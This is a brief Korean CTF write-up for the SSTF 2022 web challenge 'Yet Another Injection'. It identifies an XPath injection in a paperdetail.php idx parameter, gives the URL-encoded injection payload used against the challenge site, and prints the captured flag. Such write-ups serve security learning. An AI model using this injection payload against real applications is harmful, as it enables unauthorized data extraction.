Home
System Hacking
💉

Yet Another Injection writeup

Type
CTF
년도
2022
Name
SSTF
분야
WEB
세부분야
XPATH Injection
2022/08/28 19:16
점수
100점대
1 more property

풀이 사전 지식

+ Injection
XPATH Injection

# Problem

# Solving strategy

1.
http://yai.sstf.site/paperdetail.php?idx= 뒤에 오는 값을 이용해 xpath injection이 가능
a.
getDetail 함수 참고

# Exploit

# Payload

아래의 쿠키를 전송
http://yai.sstf.site/paperdetail.php?idx=%27%20and%201=1%20or%20position()%20=%2032%20or%20%27
Plain Text
복사

# Flag

SCTF{W4KE_up_IT's_mOndAy_m0rn1n9_183689c7}
Plain Text
복사